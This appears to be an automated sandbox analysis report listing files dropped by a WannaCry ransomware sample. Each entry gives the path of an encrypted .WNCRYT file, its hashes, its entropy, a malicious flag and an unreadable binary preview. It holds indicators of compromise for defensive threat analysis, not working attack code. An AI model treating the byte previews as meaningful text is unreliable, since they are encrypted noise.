                                                  Preview:WANACRY!......(.~...;..L.^...g.@[-LiZ.6.....U&!;K.7..\U......U.&..f+....y_R..+.....s..*.~!.G.%....Xv..t..,.....R.|X.E.T.NS.....y.v..5*.#.....?q.%5D.m..\...F\V....z@..{...|..{..]....G...q....C..z_.W.#Qo^GER.|0fV*.A_...z..!.UK.r..W.I.j.v..).p..v...k...d1E..c..............RF....d......E..R~...+....O2K..8M........^......F...C...]V9..t...n....-..-]X....k...^....!.x.J.....5.c..0....zOcQ.......C......9_...j_...#.lU.....+.6.s......Rhk>7J.....#....n9...a.v.rfh....{ ..R..A....T+m......M{N.r.g.7.*v.@......_.D.#.k.5..b.......]......J.KJ....t>&"O-.>"...,V.y..^`,\.%......rF..Ga..E..^@..8.AWMq.k.p.R.m..._...M\....(..;J{.l..Z.+Z.w..*..fwT..F.~J......f.V...'...agO......=...9.kv..2.OW.W.SL.........ppVb..C....K..}..G@..U.^.9T...e.-.....#t..y0..~.QK>.t..7..a1k.eZ.%.".9.4"EE....-\...!P...4=.-a......y...Q0 ]....>...~q..bX.jH2...1_b..E]..y.2..~c.9s(%..W."GVY.?....k... R.W.YSm.x...ZE..".v.X.....9...^S8...tF.....v..u...#^.L.F..Ll..o..p...CI.|..t.U).ql.z.f...7q.:.,...

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGameOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\LogFile_August_18_2021__5_27_51.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):568
                                                  Entropy (8bit):7.509341209212675
                                                  Encrypted:false
                                                  SSDEEP:12:bkEvew4mAnUFn80CRAC0NK9pL5vzVz9P80WWe87yxY7eKBqNYTPPn:bkNw4nnk80CGC0gL5n1WO7yxYqJO
                                                  MD5:17DBED0FC92D346F62322DF0E5E9EAE3
                                                  SHA1:E77D11EBCF494E375ADF66435BCB4E572FEFF109
                                                  SHA-256:B4795D652A8F2FC9D406180145C5A576208C40D29A1FA4F5C5B80D00A01A5F2A
                                                  SHA-512:D79CDD8D004C7B19B68FDC76F3AF74C1172290EE8857923E6270CA7ED03958F4C1909E75CFF30AA885D46DCA0807A008D27E8DA9E0A578265FEE5F829DD316A3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......X...v.kl4rhSHNf......m.o..5:..h..qh._..+p..9.b...Wu..b}.`F..5.6?.~..$A.............X...L...E...._*.p`H..u.U.1.....0.'W.C.b....Pp..>..~....^.......e0cK.....x[].~E]..#.....|k..n.L>z..z.b.8.J.:.h0z.N1..S....SQhI..|..[3..N...."w..~V..:......!.1^............H!....i.P(!~.[......gT.....u..$k"MB.(3.^...VpI.[.>..CV........8.H....|.#.}...!.f.h..|....z..|."........p...X......+1!.1.c.t.M....V[....p@.e.mz41....u.$./..V..J7.}../..Tu....|.eaa._T:bH..m...,..Z.1..H.9.....7.T..v.`...I.W.M"...e.?.!..Sw..<.@.."..{.....J...D...Z..=.e..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):273704
                                                  Entropy (8bit):7.999362519832665
                                                  Encrypted:true
                                                  SSDEEP:6144:3Bs7ILBWC8/DEwXB4VvstQPyKqaYqb67acjRsx4g2X+VoK:xHLBkDIfEqm7T85VoK
                                                  MD5:C03C51161BC64D1AA94D0CEFFA788DBF
                                                  SHA1:1BE5756F66A0CEDD7E8459D8FF57021837B32BC6
                                                  SHA-256:F92CCDC5E6FEB40D2B7451EAB1AF40AC15FEAE77F55A3FD568D8DEA14D8475A5
                                                  SHA-512:EE77AA618C0DB5842E8D605B22236376F4B4AE97986F3F02ED2F182D5E61BA7302205E0FD454BAF4E859154424BE8E4A8EE2532E5D81F9EE8E676DAD241D6FAD
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......=..Bw...L.3@/QZ].:....=I..1`|.I..-..HA..X.I([.5.P1d.<~.c.^...h...|Y.&...#.K.....,.....'2.a...u..7....Pp7.#.d....4..O...d.`(........m..w/..0Ba(O.r...1.....s.|..4:......{@0.|z}.....pt...wj..9.........r.ph.8z...4.u..n.}r.3A......s.[{....*.9.......,......=..,n..+T..d.eqR.U.|.+.K...e.L<.I.l.!.B.^$\..gy.]_ZR...[......w..G.N..=..........Z.=.Abf..W...9.D..=b&......m=E....2.)`t...3...mcg"..y@.:......G.X..7...d.6..|.*m.r.B...2.7.4~....C.;N..jW..R.*.9.R%.6v|....&..Z..p8u..b&>..Y+_.B..K[.e?y..N.......t....+I.o..v.<.Q...yL..Q.Xyk....klW...j.....d......p.[|..#1.q@.c$+"z.=....ed.....6.o*.}}...0J..*.d._Zqo.n.V.|..l.-..c....en+,rnAD.EK(...}!.....l...j..x."..yND..5@..`......*......u+.x....2rg.....Q..zkcm.....L>L....!..6Z.@5.$..Om`...LY'.o#/...5F.A..._...|..'VG.t).zs.H{*.....=..F..{...A(.U..W....#.z$"...y......O..i.uV...[.....)#o.........aX0:...P.i..v.P......iq 9^................=.g.rt....B..R.....).6.7.......Q..z...Er..}....>\IbcF~e.nV....|V/

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):246824
                                                  Entropy (8bit):7.999235805778599
                                                  Encrypted:true
                                                  SSDEEP:6144:Xevrkpy+mMR5tnqXH1wgiWG1sT/BAaQYs8efn+WTNN8W0uc:XevrkpzR5tnKT/yyaWWTNN8WO
                                                  MD5:9AFE1DC2940457CB891B665DC5524BA7
                                                  SHA1:570B87ED270AA694C6EF3FCC1A0D725B850FC514
                                                  SHA-256:0A21E8605BC9E26D5484DD905D4C47797590C42965E55BDF699E9E312AD03CD4
                                                  SHA-512:FB30E8E722141C36EDAB9F080B2300F2F81F1DDFD1A1C6CDA3886FD8A8953011F0E5103F0945740C7D8F545FA515D13B450613616E7A78F654A95893E96ACE03
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....E..C..M...M.y...Gn..........+N..n.|&.`..c.. x..F!.._w3.(.....~..%8...jM...W.i[=.....o......h}..!..h..O.\Um.V.96'..b.tY...?:GR].dx..$r.K...[..rE....T3...i.N..G....,.....`?..`.."..Xf........[..<...I}.&...n..q...u--B.~.......2..o.f......0<?O.{.................(.o....am..,.w^P...&,...es[R&.l..(.~tl...,.H...+._.......o...)1.P.#.- ...O.$..g.b..}O.;.,.z..-~.K...b"...j}.x........2n4eJ.I..@....T.*?..=p.oQ.2.Q...1{@?va..A/.m..).`............B..pN...._.P.....q.....l2..2.fQ8jok.....O...L`...A..r...;...-.0.!r..k|......\.........+...S....8.|.Sv.g...J..#...t....C..Y.........H.[.F.\...D.w.?.2,..>s.3....XSzg?n.3.N..`\o.sRU...N.]=X./.!g..Q.'./e....H..........5..{Y?;L,.b..4...jN..j.8w.L....q3.8.f...g..`..=K.z....+._........,..,./!..B...1.J..Q.{I...&.m......E[.[.pZ..._.6.F4.R..F...B......:.!f-t..N!v..H]..e5^B.Vq0.Uo.=.....<....f._.g...wy {..].i...ZA...{lw......W..,yq....Fl..$....a2...:.q...g..../5w.Y4.........k.GbD.?~.h...7...2.=..X<.:Y+a.@.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20230515092412.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):394984
                                                  Entropy (8bit):7.999547824092546
                                                  Encrypted:true
                                                  SSDEEP:12288:kzXaBdvyuzLIjEERpf5R8DjT8Vllf5mXYBkCWbg:kzXij6D00TmIQ0
                                                  MD5:7651F27F5C508E1BA6164550A34DB967
                                                  SHA1:78EAECD1649554C9BADD234C6DC617B4C0470A4B
                                                  SHA-256:F3728037B254E5C8B30632D661F8ABFA87BFEBA37B2D1A2470D4D670088A6635
                                                  SHA-512:73977D984879E41C42F83977A2B02AC800B9934FAEF95A9950E1605EB8B9845AA6676BCF77305E953F519AC77FCE6B0D5544D7BAAECDFC49DD4AB21C0D3C8DF0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......`g..O......y.....L.........p..tw..F'....6.....1....`A....P?..$)n..'.....&.M.F.30..6.O.{..o...`..$~...|..l..uM...J3.....^.....o....|G*..H.TY..Y......[l.h4.y..?...a.S...&...3..e......<.T.........e..h..K.......qQm.`g{.V.u..p..-.~..&&..w.6.............{|.O.;...q&.8..].....:.e.....".....Ju.!{...u.t....i.........|..H.y.!..;f.l.e.g[I.....b.c..R..)..b~[<.o7..\(7&..Q.%.]..N-~U.Z.sj....J..h....D.{,..6.y$...jx.x.Fb\.s.....yxmn...K9M.<..X....`.C.N....i. :Cfq......CmX.V...,..c.O.PB/42...~....d.&.2....`.+2h(..........y..U.N(.15VF..>.#.......hw...#...!..+ig....hH...;aO]....<,.\.t.,u..O./...J..n...\A.lNb..V.Ye.Y+xL..$...........T.e..Q..1...J.J.........}.53..j/.i\.h.r.d$.?.2g.(.v..Fiv.z.U...iK.<.A~.m..!..|+)..s..vl.R..T....v..c..9.b.I...Y......X.....3@..u1.=.Y........:....$.d....Q6X...v..0;.....T..+..S..y.2.=.$]8.&...1W.i.~.8d[Ok...K$.....q...........O\.....{.C.S.C.r.n..a.D..G[0~Y....x.+....6Z&.~zA..e.P.>...c...y!s3)~K.a9....6..

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20210930121453.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.992575960635192
                                                  Encrypted:true
                                                  SSDEEP:384:luBo4Gay83W3BHocGqJffNowX7e3KJjxFULLDRWU25cBa5V7Qs6yXwsHQHbd9Z58:WLGQG3BrlJNow7xUPecBa5VHXzm76fuM
                                                  MD5:AA3B20898E69D0BBB0CC0D036FB984A9
                                                  SHA1:BECDD345F2D8CAEE2B1B825F8FFFB3633B88B1ED
                                                  SHA-256:AE9B4FA858EE57B0ECEA3EEF286DD269DC810F0464EB0AEB6D16A0014BD24B26
                                                  SHA-512:91504204389DE618B0F4879D51F3B41E1EE463913826E09146ECEE023E1E6E25866FAB24ED238C36B2E039839691ABAB088CCADD7CD76F2D48A0EA0C66D98F3A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....K.$.......J.....tR......h...uzks8...}Q...B.W'.&J.Di+.2l..0@...w..f@.."IjI......R...C...\&5Z..R"..BK..........Ai..)....=.;.y<!......:...c........p..!..y.......I..)..m...g.G.....~{..P7...I.......U..3.L..i.m..|w.B.b..G..#0....y..... 7b.dS..Y.....Ba.......+.......e.f..V.....K.g.."d......1"|d..|...=(.AO..?..`..{.g........2Gl'....S.. w....8z. ....$.o|.t=B8.+.....V..G...*...<.w..P..V..7...}I`.M.|.K......W..Aq^.M....L.l/..5n.cl..+^....=Ug..aMw..~...!.<....;.\g...lx.8.(Q.n.%n....m.V.! ..._8..6[-xN. .4.L....6.CH{.F.@$4.P...r...M..P}.`.........PZnF!....h..Y...+m.R~>.x.K8.....W,N"............l#3....o..=..4."0....L..e.....:.J.bn..S....J0!.......fh...e.l>..:B),.:E.Mi@.,-L!.<..*.0:9...-..i.x.{F..k......J.p....J.c{/`...C.p.....#V....|f4.....(..6wB...4us?..#.^.:}.,O3.u.....&..`/=.....?...cBs.S..|...........r....,...u?42....WK..1..lq.....MC.m.z......X..B....L<....i!...p.gxD..I.-H.....Y0..o....chjO.....Jk....W..."fL.... t.]...^3;.`.j.f...\..W@.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20220223140416.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25192
                                                  Entropy (8bit):7.993655517996397
                                                  Encrypted:true
                                                  SSDEEP:384:GQoNgVsIbhHFFA0fqxtSFYCSWjxz0c8rDM6Iaq5tregyu4jAlJ9v1UIyZSaC:LoysiLqwdzUvM6IaAtCAl3+Xg
                                                  MD5:E96E2364C51CFC4D6BA13ABAD2DD54E9
                                                  SHA1:EF4F2AA9E7398991751D86864873D2F93CF384C6
                                                  SHA-256:77A3F7069AF8329E61BE21ABA45DA76B8E74F3BAB8422A0ACD1561767CBF9055
                                                  SHA-512:E42DCE2A1BC0C2C2DF7CBA0F405A354BD4D03F312629D1773785AF9186F7EB7EBA907FA441DB494EE65ECC192E00B51885BE6AE18EA54360A9DCD69B5B427179
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........d.....R.D.0.6...3.aTB%<.0Fh.....:x...>..O........\.M..3...i.5xG......#q..G.C..n~....^..<...9$.Sm.'..oy:....!=...Z.1..9e.wXt..v\.d.W,"...l\..$..6..B(....d.N.....L...Q..LI/.(.u.]=.......H....F....c.bJG>.}.{:......$.G8lbVE^....~...f..I.2.....Ba......]+|.8Sq.+..J..k..'o.x..B.n.A>.vn=@{.{k.....+Z8..1.....nn..%....u...Q.l<.E....I.1`.(..s.n...9.Y/.TV.;U.g..s..w..?(?...1%E.py~_..........Nu.j.D....n[...+.I..>.."...#.v...)...$KK*,.v.k...S.&P.hR..n.F...:..;.^.?.D.MlZ.d8e.j........4-.p.,ip.;? ......c..!. h...pQ.....&Jr."L....wK.!..^..A.t........4..S.1..]...F..+.:......1+.J..ti.B(./d7.h$..uM\.t.~[.S.....!.jCj.w.-SA...?...v.j.Cl.g9c..G2+.;~.Q.%....U.6........c.\.....q...~....81r....F.W....mHmn.....:(.IO.KRq?...l.B1..N...m.J.o.........?hW.w....ya..m!..K.R.....1@..Z.......0..D.%.X.....E..r.n.y....TL.....7..~&...c...S....z\@....7g.Q.8h.c....t).z.L......_.R....K....v0......N.F....R..&.../..9..p.v.@5_*.CA.~....jg..@.I./q...=BY..:-H...x....Q.

                                                  C:\Users\user\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_FT_Server_20230515092412.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):77560
                                                  Entropy (8bit):7.997642881789174
                                                  Encrypted:true
                                                  SSDEEP:1536:vhgEXgkVGtEx4ub4DLDzEt7qUpn3b1uKdPOnG7aT8x8THQFb7taTxm2+tNLU:JtkW4DHM3pn3YKdmnov8M+AU
                                                  MD5:779BF9E145CBDC4ADBD8D55998038D09
                                                  SHA1:7AE0BBC54262875A32EF7083DF316DA79BB90A77
                                                  SHA-256:A07ACADF2D82264D67489A906F4A88BF158FFF77D9E5DD1A6FF8463FBEF56099
                                                  SHA-512:F75E945EE3C3CA3DF8663214472AA9BFA568FE059F952D9841E888D4DCE965A1A500A7EA83B11E688996B9ECA54A65BFE306385F459FBCA113E92DE8BBD850CB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........).1T1....U.JG..MQ...Zm.FV.\...N0...O:.....".Y....=.............{].........<.)}...!.9...t...4....Q.-1.0..OX.tz..F..'....u.....<.%-.~...+"....cMG..-.r..e9..+..K..5P7G......a5.'.k....V<...j....U..R.S$.w8v...............\Y..8Fi..`.y.+t...C>...?.....-...........[.n.v.^..&,'..r`,@..L.P...)1Y....b....|~2.Ry......u..#n.....5.......pY...l.a7......b.Y......F...t"..*/....._..|`....!....jS.B..-.=w...=W....9P..>..um.....+.....y.......F...........D..o...'\...... ..<...E.9eD.....Xk|..*.5..I.....7 ..|y.$...-............t....h.U/cX6h.m@r..u..[....d.|8..N!~.,y..K.!J*...]..:..WT..S....$.....<.uiv.;.\.bml..U..1..B.y.?:U....k4...{0z..lP..n.1.n$..v..,...`!.52m...9.oe...$s..z.f....X.G.EEG..*...........?...`."D....q(..e*>w.h...GF....u..uS....<|.#.s..Q.w...WZ...j`4.*.>...@l.W._`.F.k;..-..I...#...1.....<o&a....7.u.....;....I....=@D..(.....&.F.C.XS.O.%'...+H.E..%..W.I.p[>.}....S.........zC.ke.....N..#....K....a..kr........U.N:....@Q...T'$rj..G.....

                                                  C:\Users\user\AppData\Local\Temp\0.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:OpenPGP Public Key
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.799921555501172
                                                  Encrypted:false
                                                  SSDEEP:24:qucE/o/2oDShx9qS+zu8OutH4BMa3GSqPg6qL8ue2/vjQhg:q3uUSha1zuxGXPZmem
                                                  MD5:DF4AA61F413063D04995DCF91F674D1E
                                                  SHA1:C2AFA5936CCAC4043DF376EBE004887EDB35C4D5
                                                  SHA-256:3C9A6740782AA91F7F72E203B6883359A409AE591B697651B43A3C8A2C004A4B
                                                  SHA-512:E856F14F7C4C3F61D3E1D7BBF21AED404716555CEB5FFA6519FFB305241F1213D61FEC1FD374BEE97359A3135F49B4628A84CD02307FFB821ECD210B49FA2DA2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:....._.....?.|Pd)..8..?.n}p....;..e.....l{.<zIc#....L...ti....F.`.T_.w_..^.h..._.sg..z......Y@!.Ev.Rl.n8..^.....c.A.5..M....8...Pa.l.......L.y...D...]...z..zV......Q./.Gj...d).L<.U.u.n../F..._... ..o..?d...gZ.Ma........R2.{.....a....O8YA1...\.E.7w 2.....fP...j~J....K_q...g.V............X!T..F.........._...H...M...2<h.....Zr...q.5........W../...'.T..R9z.....h.l% J.....{`.}....#.=.}(6.....0.!g.c.Z.<P..^.....L..u.V~.M....=._z(.....'...y|_c.<...^V2a..z8Y...:vv, ...Q....K...q...3...x..}.J^j..Bx.d...)@g..6....\p.tW.Az.-f.e..r...#.....-u^...[...k..t..1.<_5..v..~.!].I.:...=...t.p.8.[p.....<..b....W..........iZ.k.@.b...$C.....2(.7=...3...<O....@u.p.'..V.....zC.M..U@...B.g. ......`..7S.Q.`.<.v@.....U..+HE.P%w..m"G..G..'......C..>...A..y.x9_[QV...l.D.I.u..O-...AZ......w..:..._..+..R#l=hmX.*#+.c..a#m9.|..zM.r....1<t-!..p.......1.6m..~K..#.+DF.%....O..[.~.2.;.'../a]v.'G.R..H..i..D....#.F9..Q..1..{wjh...m..y..Q.9...n.!N.....r.y..eF.K...Q.l...2..h.V....<T*..

                                                  C:\Users\user\AppData\Local\Temp\1.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.825044871503022
                                                  Encrypted:false
                                                  SSDEEP:24:5AvgJmSNZj6YiA4JGHFXJbL7Um8Y+i0e6YyMyVC02w:evgJmQOAtZJfINY+G6YyMEh
                                                  MD5:BCC0779388487EF6F69C9B1D479E713C
                                                  SHA1:0D113DAAB6BA8A93B5381EF0433DC52BFDDFEA44
                                                  SHA-256:FAC97E995D83AECBB71576223E0E917335E4788AFCF66058EDEF1C5EF4E58D62
                                                  SHA-512:0C4734F7FA1B4A845F4882A93ABE94683FDA565DF39ACC6FB76A469196F422EA71F779F51AA9BEBA63266331B7A1AB648FF98798B6AF87AC5014EE0A01B8F884
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:XM.`..."../.........C....60...Q.y8V..F..!a...cS...H?..w u....8...O...(e...`....y.^O.W...9.Qsx.Q..*..`..cW...:..e4......X...,..Hb..p?x...N|T.}c../..,`..Q...F.........2.'G..@.d.i....0.....U....))..D...2..+`....|{...&B..<;.4...(.Z{..x}.T?.K.]..+W[DYF2]...3*J.).O.U....}.z.7>.Q..6.............Z..V.H.-..bn.......#vS.L\..L..Dy...W......%F-h...qzd...g...*..#.$...H.+..'.v8V..'....l _.......b../...O.Dld..(.h.V...E.q...B.....Z.zO,..T.G.V..b^..f..5o.5......-l......P]...qs?"D...i,.E..+Na+.....}.Z.J....HB...T.F.....Bv....p.@6...[\....d.g)...")...LX. b.{nX..._..n.....f..e..D%t..^|..P.Y...#2y...Q...a..../7.A+{.0. ..^.h.s..b.....mn.a...\.2..E.k..8..P...l...).....b-'Ii3d..aKS|.`d....p.K........Hk.H..F.z....g kx.........ft.7........M....".....K.d%1.B;:p.2....OE..3...vMa.V.$...,..*~...e^f .Z...85>.4...Jj.}.>s..Kd54yO.....LM...m...>+..C...Y...v.o.Q.....3r...X..9..^7;..5.@..'......[.....&..\([M.......a.`..q.-\../-.M:...R..S.frF.....`a.............D

                                                  C:\Users\user\AppData\Local\Temp\10.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80440826011533
                                                  Encrypted:false
                                                  SSDEEP:24:A+3kiKL/6QBiSYV1FKPqatxul8dfLaqAAbfnW/xp2GgH:A+0//6Liq/mdGgbfnW/x4
                                                  MD5:12EA2208D6C0B8FF88A3DAEEDB6664EC
                                                  SHA1:0BD3BAA4B5D07CC9C6FE03AB03578C6CED7C675C
                                                  SHA-256:30E40311A5DA56B950E9B1AACD3E80D65DC8FAB3F5F0532E182234C19CFC8D0C
                                                  SHA-512:49204C016A91E16273D67DEE37F5AA3AD20E6B09A8937D57239CE6E93ED471F3C6A66A9CD10BA514064F47B14357478A8867073DEC88A042CF78F55DBFB46676
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.f<.9.w.]s.a9.c'...h-..=k......R....!4t.S.AN.\..U.U.?...a........W..j....mUy0....;..x..._.f..........Bh/.>..'t..G:F...r\|.Bc.gA,..!..D.r.[....{...._.\....H...}....&5.S..E<..c.U4..Ch..a0..h=..9w.._x......).......jO....4c......P...v...R~W?.b..'Q..i'.^=..........C.x..j$....2R.../....@KQ...N.......y..:[&.B.......^z.|.At....h.\.\;v..V..B.9P...OU......#....!..,.(m...6v?.`......!..W.DW...X..P@....cX..#......w......[.}.....Z..D...!..B..._...:..7...8.....\^.u.5y..I...t..-.c....z.^4.AW....+..`)..]...p..'..T..LV...lz5.5P.VF....#1\v... ....$W.%..BM}.9....wF.pmbo.....F.e..P2.S..5c..<"....l...o...t.,]{g,........h....c...k..(.%.&8..Xt.../}0..}..W...H(U......*'D.K...4.a..Y*....e.a.6.>...=b..t.PT.]......'K.?X>......v}/D.9....wC.O.B.....J.d...V.;....47M.8.*I8=...~...@r[S....%k.....;.t...=..f..% .s...q*..Bp.KU.P..0..0A....!.....Ze*....u..B.P...j..m...^..E#&-u...3.Tw...7.jw..#.9._...{..u?9..B4Es...HK..F.. ....;..V....F@ra..6.a........Y..7......

                                                  C:\Users\user\AppData\Local\Temp\11.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805428173096447
                                                  Encrypted:false
                                                  SSDEEP:24:QmGYGywT47l5zenulYUDGRpq1FDApRj1Br8jqy:QdhywYakGRWF0f1mjt
                                                  MD5:A6380DB5FBCDAE0BD6936F3FE846F45A
                                                  SHA1:49ACEEB0D348BE85272692EE54453CF2430DF1E7
                                                  SHA-256:CD84DCC255564CAE182304573309C2D5AB7F6313B82FC87FA8D713F05F500E5E
                                                  SHA-512:28D689A53A54DB40AB90EF31988D6079781D2029CC1D349D273EB82B578C4F1F54AEDBFE4FB77D6815563AF6C5C058B11936E94C6AD2B473AA61C1CEB4FBF4CB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%^.+...*qaE....~..<.Z.ER..<.LG.3.b!..^K.+..V...#...<..,9..^^E.Pc.X...<f.k......#.].5.B{ty....,..Gk..Y..@.r.U...)..a...M..t.%^..%.._.a.meC....-... 9.a.8E...P..&..|!$`./..6zP.zyl......N.&eW).^...r.+.p.5...O.C4..&...C..I.....\.NB.+..'.....5..*.~9..\..............N...#..*k........." RJ..4P..vu..ee......O{[m....F.t..2.s.rpy.}....eVh..[...|...Wh4/\...e.F.n.P....r2.+.......7......G..\..XP"...@g.P.2. ..C=[l....f.2"S....`.S........F".c0B..V..D.r.@....`,........I..NZ...G.A.......rk..;pBT.(T..$.z.'...y.Hz.............c.uiw}'..*e......t..i..'...j.?b.M.....Z..A....a.........q.c.....LH.......f.s.'..t'F........#"4sM...._)w.8...y..sb........_..+..M]H.dD...+..M^.G..,.%D....;.......i.k..x\...+.57....\te....a...3-..$Cj.\pQ..Y..2o.4.Q=.'.$~G.'9..i.~....]....!.C.Z...v..._S.c.......d.U.?.....%........>P.Sa...}.$&T.....d{."\..t......w...8..K>O.s..)..`4t..."V2.....tn...N....&8...s.(.J.M:........x.-^.........W'"..k..h...".Y.B......U.]/.8........r/...k.j.

                                                  C:\Users\user\AppData\Local\Temp\12.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.802905153358807
                                                  Encrypted:false
                                                  SSDEEP:24:mFlZaLqINNM7vad6xWRIieMh50uHM6ceLbnnXMq:m1aLqINNSad6xWRIiDh5Zs8n8q
                                                  MD5:6956AB587CC992071A6C4F586D677948
                                                  SHA1:04D586ACA852F4412DE330A0998F49F704A0EFC6
                                                  SHA-256:E104E1C1A6532BC1ADCE6FCAD376134DFCB5BB97E6CEC589D08BBDA0FAD68A23
                                                  SHA-512:AA271610BE37E0925B4282592DD8D7470EDB367DBA2D749C848B59719DA12C046B041CE97DB3170B238A735C48EFE919F091EEEE3D6A00CD351B56D95C31E2C5
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:pt..... ..Z..=.\a...~|.;{..Q_3.7%..$.<.m...0"]j..-.M.U.&h...l..,^.w?c..(..-..X.G..f...X...-...A..~+a.rG.c....../.Z..(%>W.I.*?&...j.c.........X...]azw$..5.D>.^R.t.........8\:.@c2.e.M.....Q.~t..>.@.(..7[%...6.m.6./xh.X..[.!."...E.3t.a....=.... NhsA....]........].L.e. ....D.;.ocF8.o...W..X.y.p..^t..(./`G.T....6.WS.5.b....e"..95d._.r.!..8w.wz.... ...q....4a....:..&...-3.o..{$..+.(..4H...Z2.8....... ..K.rI.o.0z*..Q.'....T+*; ..`V......o.G..Pyc#..R..b.M.....O..r:.)X../..V....^.N..o{.m,..'.\V..{../$..f7..1R.b a...m..]w+.woGhM..S......lT)..c..P..a...,...)H.o.?2.0.I...+.6..{.m.:....h...^~5&.z.v.U..= Wr....,.%.A.v.J.k...d?\&C>.d.j...2,...s...>aV..?v.Do.L!.YA>C.\...x.....ub.,".Q......xA.e+.n...t.4.......o*.'....5\...8!v2.$.........A........{..H...H.@.v..u....6.2..pe.Qz=F....d.-...............[.z...Y.%:c...QA...q.k.kb..F.....f_..x>.....c..S/..wn...SM....}.[.fFH-.Tvh......&...Xn.H...JD,.b.e..*.GOBoh.g....x.;..c~.5s.:a4.f.t.&.W.....k....Z.1..

                                                  C:\Users\user\AppData\Local\Temp\13.WNCRYT (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.822510363879958
                                                  Encrypted:false
                                                  SSDEEP:24:lpEWqPNgGPxlcblmfaCJZcbSx66KjZE3XH2JnA9mQsMikNxJV:fbql/glmNJZiSjX2Zo7EK
                                                  MD5:5D7F1BDA9DF0FEC50FAD1C766526A4FC
                                                  SHA1:CA18AEDB6898EE6774D1B9CD58F050BC698B7863
                                                  SHA-256:D60B4B8CD438FC833563F66BF313DD4961A843B36D4D6DE6CC329EEA27105D76
                                                  SHA-512:948E1819FCB41C48824B78C8D2CFFDEFC0504EF137B7CE45E3A0C768907760163D8B02429CAB5C4DE6CD406E5C1F8CF0A4C03CC93064B5E744D5966749151D61
                                                  Malicious:false
                                                  Reputation:unknown
